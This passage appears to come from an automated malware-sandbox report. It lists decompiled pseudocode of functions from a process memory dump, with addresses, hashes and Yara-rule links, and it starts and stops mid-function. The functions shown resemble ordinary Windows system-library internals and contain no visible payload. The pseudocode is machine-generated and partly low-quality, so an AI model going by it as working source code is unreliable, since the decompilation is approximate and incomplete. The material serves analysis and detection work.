			}

0x00fa9082
0x00fa9083
0x00fa9084
0x00fa9085
0x00fa9087
0x00fa9096
0x00fa9098
0x00fa9098
0x00fa909e
0x00fa90a8
0x00fa90e7
0x00fa90e7
0x00fa90aa
0x00fa90b0
0x00fa90b7
0x00fa90bd
0x00fa90dd
0x00fa90e6
0x00fa90bf
0x00fa90bf
0x00fa90c7
0x00fa90cf
0x00fa90f1
0x00fa90f2
0x00fa90f4
0x00fa90f5
0x00fa90f6
0x00fa90f7
0x00fa90f8
0x00fa90f9
0x00fa90fa
0x00fa90fb
0x00fa90fc
0x00fa90fd
0x00fa90fe
0x00fa90ff
0x00fa9100
0x00fa9102
0x00fa9107
0x00fa910c
0x00fa9110
0x00fa9113
0x00fa9115
0x00fa9136
0x00fa913f
0x00fa9143
0x010037e4
0x010037e4
0x00fa9117
0x00fa9117
0x00fa911d
0x00000000
0x00fa911f
0x00fa911f
0x00fa9125
0x00000000
0x00fa9127
0x00fa912d
0x00fa9130
0x00fa9134
0x00fa9158
0x00fa915d
0x00fa9161
0x00fa9168
0x01003715
0x00fa916e
0x00fa916e
0x00fa9175
0x00fa9177
0x00fa917e
0x00fa917f
0x00fa9182
0x00fa9182
0x00fa9187
0x00fa9187
0x00fa918a
0x00fa918d
0x00fa918f
0x00fa9192
0x00fa9195
0x00fa9198
0x00fa9198
0x00fa9198
0x00fa919a
0x00000000
0x00000000
0x0100371f
0x01003721
0x01003727
0x0100372f
0x01003733
0x01003735
0x01003738
0x0100373b
0x0100373d
0x01003740
0x00000000
0x01003746
0x01003746
0x01003749
0x00000000
0x0100374f
0x0100374f
0x01003751
0x01003757
0x01003759
0x0100375c
0x0100375c
0x0100375e
0x0100375e
0x01003761
0x01003764
0x00000000
0x00000000
0x01003766
0x01003768
0x010037a3
0x010037a3
0x010037a5
0x010037a7
0x010037ad
0x010037b0
0x010037b2
0x010037bc
0x010037c2
0x010037c2
0x010037b2
0x00fa9187
0x00fa9187
0x00fa918a
0x00fa918d
0x00fa918f
0x00fa9192
0x00fa9195
0x00000000
0x00fa9195
0x00000000
0x0100376a
0x0100376a
0x0100376a
0x0100376c
0x0100376c
0x0100376f
0x01003775
0x00000000
0x00000000
0x01003777
0x01003779
0x01003782
0x01003787
0x01003789
0x01003790
0x01003790
0x0100378b
0x0100378b
0x0100378b
0x01003792
0x01003795
0x00000000
0x01003795
0x00000000
0x01003779
0x01003798
0x00000000
0x01003798
0x00000000
0x01003768
0x0100379b
0x0100379b
0x01003751
0x01003749
0x00000000
0x01003740
0x00fa91a0
0x00fa91a3
0x00fa91a9
0x00fa91b0
0x00000000
0x00fa91b0
0x00fa9187
0x00fa91b4
0x00fa91b4
0x00fa91bb
0x00fa91c0
0x00fa91c5
0x00fa91c7
0x010037da
0x00fa91cd
0x00fa91cd
0x00fa91cd
0x00fa91d2
0x00fa91d5
0x00fa9239
0x00fa9239
0x00fa91d7
0x00fa91db
0x00fa91e1
0x00fa91e7
0x00fa91fd
0x00fa9203
0x00fa921e
0x00fa9223
0x00000000
0x00fa9205
0x00fa9205
0x00fa9208
0x00fa920c
0x00fa9214
0x00fa9214
0x00fa920c
0x00fa91e9
0x00fa91e9
0x00fa91ee
0x00fa91f3
0x00fa91f3
0x00fa91f3
0x00fa91e7
0x00000000
0x00000000
0x00000000
0x00fa9134
0x00fa9125
0x00fa911d
0x00fa914e
0x00fa90d1
0x00fa90d1
0x00fa90d3
0x00fa90d6
0x00fa90d8
0x00000000
0x00fa90d8
0x00fa90cf

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9d60afedce96b73673aec891ab3c182424e7d76458420bbd13d84394dababc
Instruction ID: 85479453043b185cecb60a2f61dda38c2aa0325c38da72bd1e86cc9b8c909fe6
Opcode Fuzzy Hash: dc9d60afedce96b73673aec891ab3c182424e7d76458420bbd13d84394dababc
Instruction Fuzzy Hash: 4601F4B29052048FC3258F29DC40B11BBA9FB42360F21C036E2018B792C3B5DC41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0103C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0103C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00FE9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00FE95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00FE95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00FE95D0();
				return L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0103c458
0x0103c45d
0x0103c466
0x0103c468
0x0103c469
0x0103c46a
0x0103c46b
0x0103c46e
0x0103c46f
0x0103c471
0x0103c476
0x0103c476
0x0103c47c
0x0103c47e
0x0103c480
0x0103c480
0x0103c483
0x0103c484
0x0103c486
0x0103c488
0x0103c48f
0x0103c491
0x0103c493
0x0103c493
0x0103c48f
0x0103c498
0x0103c49e
0x0103c4ad
0x0103c4ad
0x0103c4b2
0x0103c4b4
0x0103c4cd

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 4e6ceb0f653303611bc576088150ddcc21efa7278ee85c777a8c653b1dd116d4
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: AF01F972140645BFE721AF29CD81E63FBADFF84350F004525F25492561CB35ECA0DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 01074015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01074015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00FC2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00FC2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10986ac);
					E00FAF900(0x10986d4, _t28);
					E00FBFFB0(0x10986ac, _t28, 0x10986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00FBFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0107401a
0x0107401e
0x01074023
0x01074028
0x01074029
0x0107402b
0x0107402f
0x01074043
0x01074046
0x01074051
0x01074057
0x0107405f
0x01074062
0x01074067
0x0107406f
0x0107407c
0x0107407c
0x0107408c
0x0107408c
0x01074097

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d748ebc08ab9b04d66164c0383fb46b2118654aa78fd29bae01c02f89aba88
Instruction ID: 05130f60a21fddcb1d6f5fdb2f140c34e0aa04733a6eda6a0d2dfed74ad9cae0
Opcode Fuzzy Hash: 83d748ebc08ab9b04d66164c0383fb46b2118654aa78fd29bae01c02f89aba88
Instruction Fuzzy Hash: 69018F72601A497FD751AB69CE86E53B7ACFF49760B000229B50887A12CB38EC11DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 0106138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0106138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x109d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00FEFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00FC7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0106138a
0x0106138a
0x01061399
0x010613a3
0x010613a8
0x010613aa
0x010613b5
0x010613bb
0x010613c3
0x010613c6
0x010613c9
0x010613d4
0x010613e6
0x010613d6
0x010613df
0x010613df
0x010613f1
0x010613f2
0x010613f4
0x010613f9
0x0106140e

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050ae248a430c0d2d2769f232e55c7395e7cd5235ec56fabf8f6fd68a8f1ea11
Instruction ID: e8b583d84f5767211aeede71c3cd120fa220425d9cd6350ca879dd1e5154cba2
Opcode Fuzzy Hash: 050ae248a430c0d2d2769f232e55c7395e7cd5235ec56fabf8f6fd68a8f1ea11
Instruction Fuzzy Hash: 80019671A00358AFCB10DFA9D842FAEB7B8EF44700F004066B905EB241D674DA00C790

Uniqueness

Uniqueness Score: -1.00%

Function 010614FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E010614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x109d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00FEFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00FC7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010614fb
0x010614fb
0x0106150a
0x01061514
0x01061519
0x0106151b
0x01061526
0x0106152c
0x01061534
0x01061537
0x0106153a
0x01061545
0x01061557
0x01061547
0x01061550
0x01061550
0x01061562
0x01061563
0x01061565
0x0106156a
0x0106157f

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1dc695dbabf0299e9b3249a6eff85bd997588f3c2ea745c2ba1758d44ef680d
Instruction ID: 51fe41fa73eb1eeaf30be9052ecfa03edcc501210ed2900d96aac23a203a0969
Opcode Fuzzy Hash: a1dc695dbabf0299e9b3249a6eff85bd997588f3c2ea745c2ba1758d44ef680d
Instruction Fuzzy Hash: 26019271A00248EFCB10EFA9D842EAEBBB8EF44700F404066F905EB281D678DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FA58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FA58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x109d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xf85c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00FA5943() != 0 &&  *0x1095320 > 5) {
					E01027B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01027B5E( &_v28, _t28);
					_t11 = E01027B9C(0x1095320, 0xf8bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00FEB640(_t11, _t17, _v8 ^ _t29, 0xf8bf15, _t27, _t28);
			}

0x00fa58fb
0x00fa58fe
0x00fa5906
0x00fa590a
0x00fa593c
0x00fa593c
0x00fa590c
0x00fa590c
0x00fa5911
0x00000000
0x00fa5913
0x00fa5913
0x00fa5913
0x00fa5911
0x00fa591d
0x01001035
0x0100103c
0x0100103f
0x01001056
0x01001056
0x00fa593b

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d7f1f887fc653803ced1bfc76b61aff2462ad38634031dec16a16135c7e8f1
Instruction ID: 166a9dd239c5b98c103bb8c547fc5f64442486adfa0d135326241f9e8c043fc4
Opcode Fuzzy Hash: 90d7f1f887fc653803ced1bfc76b61aff2462ad38634031dec16a16135c7e8f1
Instruction Fuzzy Hash: 4601F272B00904EBCB15EB69DC11AAF77ACFF49B30F944069EA459B245DE30DD01E790

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00FC7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01027016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x00fbb037
0x00fbb039
0x00fbb03b
0x00fbb040
0x0100a60e
0x00000000
0x00000000
0x0100a61d
0x00fbb04b
0x00fbb04e
0x0100a627
0x0100a634
0x00000000
0x00000000
0x0100a641
0x0100a653
0x0100a643
0x0100a64c
0x0100a64c
0x0100a65b
0x00000000
0x00000000
0x00000000
0x0100a66c
0x00fbb057
0x00fbb057
0x00fbb057
0x00fbb046
0x00fbb046
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: f18c423b171456680549d26968335e4eb976f7be164ddedbafb894e85d82ce6a
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 9E018F72704A80DFE323975DC988FB777E8EB85790F0900A1F919CBA91D768DC40DA20

Uniqueness

Uniqueness Score: -1.00%

Function 01071074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01071074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0107165E(__ebx, 0x1098ae4, (__edx -  *0x1098b04 >> 0x14) + (__edx -  *0x1098b04 >> 0x14), __edi, __ecx, (__edx -  *0x1098b04 >> 0x14) + (__edx -  *0x1098b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0106AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00FC7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0105FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01071074
0x01071080
0x01071082
0x0107108a
0x0107108f
0x01071093
0x010710ab
0x010710ab
0x010710c3
0x010710cf
0x010710e1
0x010710d1
0x010710da
0x010710da
0x010710e9
0x010710f5
0x010710f5
0x010710fe

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498fa1a92f218482115ad535a8d847fba0710918f6766daec1e4327ee7c40ac6
Instruction ID: e6b5ca0203bfe3e1a6d0c094116c80cde9691be4c093efa770ea1e5eb8625247
Opcode Fuzzy Hash: 498fa1a92f218482115ad535a8d847fba0710918f6766daec1e4327ee7c40ac6
Instruction Fuzzy Hash: 79016872A043429BC751EF28C800B1A7BD9BB84300F04C919F8C6832D0DE74D440CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0105FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0105FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x109d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00FEFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00FC7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0105fe3f
0x0105fe3f
0x0105fe4e
0x0105fe58
0x0105fe5d
0x0105fe5f
0x0105fe6a
0x0105fe72
0x0105fe75
0x0105fe78
0x0105fe83
0x0105fe95
0x0105fe85
0x0105fe8e
0x0105fe8e
0x0105fea0
0x0105fea1
0x0105fea3
0x0105fea8
0x0105febd

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc4a8884f621157ec2e67247054c7bd9ef0e6590b9860971e54602b01154c1c
Instruction ID: 91a5075792201fa5378976a034c684e9837ac3359f99283fc098a9ef0d6c80bf
Opcode Fuzzy Hash: 7bc4a8884f621157ec2e67247054c7bd9ef0e6590b9860971e54602b01154c1c
Instruction Fuzzy Hash: 2B018871E04249ABDB14DFA9D846FAFB7B8EF44B00F004066B9019B281DA78D901D794

Uniqueness

Uniqueness Score: -1.00%

Function 0105FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0105FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x109d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00FEFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00FC7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0105fec0
0x0105fec0
0x0105fecf
0x0105fed9
0x0105fede
0x0105fee0
0x0105feeb
0x0105fef3
0x0105fef6
0x0105fef9
0x0105ff04
0x0105ff16
0x0105ff06
0x0105ff0f
0x0105ff0f
0x0105ff21
0x0105ff22
0x0105ff24
0x0105ff29
0x0105ff3e

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f433ed9a4afbc41908cab5ca3bfcc0e2d29386070f37c77f50e00d7178f9690
Instruction ID: 0d445310db50f22057846fa87ec5cf824a8b372e30b90d02e60277e7745e212f
Opcode Fuzzy Hash: 7f433ed9a4afbc41908cab5ca3bfcc0e2d29386070f37c77f50e00d7178f9690
Instruction Fuzzy Hash: D6018471E00249ABDB14EBA9D846FAFBBB8EF44700F404066B901AB281DA78DA01C794

Uniqueness

Uniqueness Score: -1.00%

Function 01078A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01078A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x109d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00FC7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01078a62
0x01078a71
0x01078a79
0x01078a82
0x01078a85
0x01078a89
0x01078a8c
0x01078a8f
0x01078a92
0x01078a95
0x01078a9f
0x01078ab1
0x01078aa1
0x01078aaa
0x01078aaa
0x01078abc
0x01078abd
0x01078abf
0x01078ac4
0x01078ada

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6f7434d2f2751c1f48b483115c5483e43f8f20a2cfd13144b7d296ccc59e82
Instruction ID: 4a7ffa16a41d0298072e13b7d628f153890dd51a85681359a2d89c2470254fef
Opcode Fuzzy Hash: 6a6f7434d2f2751c1f48b483115c5483e43f8f20a2cfd13144b7d296ccc59e82
Instruction Fuzzy Hash: 370121B1E0021DAFDB00EFA9D9469AEBBB8FF48710F10405AF905E7341D634A900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01078ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01078ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x109d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00FC7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01078ed6
0x01078ee5
0x01078eed
0x01078ef0
0x01078efa
0x01078f03
0x01078f0c
0x01078f15
0x01078f24
0x01078f27
0x01078f31
0x01078f43
0x01078f33
0x01078f3c
0x01078f3c
0x01078f4e
0x01078f4f
0x01078f51
0x01078f56
0x01078f69

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08039e9b0951d77499563e8e4e685802a123a30c2d6cb44e59826c502c356ab6
Instruction ID: 352beeb1e5316806234ff4df4405beb73ae133ae1ad9183b994e9ebd33ab50b5
Opcode Fuzzy Hash: 08039e9b0951d77499563e8e4e685802a123a30c2d6cb44e59826c502c356ab6
Instruction Fuzzy Hash: AC111270D042499FDB44DFA9D945BAEB7F4FF08300F0482AAE519EB342D6389940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FADB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00FADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00FAE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00FAE8B0(__ecx, _t14, 0xfff);
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x00fadb64
0x00fadb66
0x00fadb6b
0x00fadbaa
0x00fadb71
0x00fadb76
0x00fadb7a
0x00fadba3
0x00fadb7c
0x00fadb87
0x00fadb8b
0x01004fa1
0x01004fb3
0x01004fb8
0x00fadb91
0x00fadb96
0x00fadb98
0x00fadb98
0x00fadb8b
0x00fadb7a
0x00fadb9d
0x00fadba2

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 05c90795d4434cafaa64eb99c45ada84b0e73f2cdf3235d4fc2e4f72030cec85
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: F2F0F6B3601622DBD3326A558C85F2BB6958FC3BA0F270435F2069BB44CB648C02B6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FAB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00FC7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
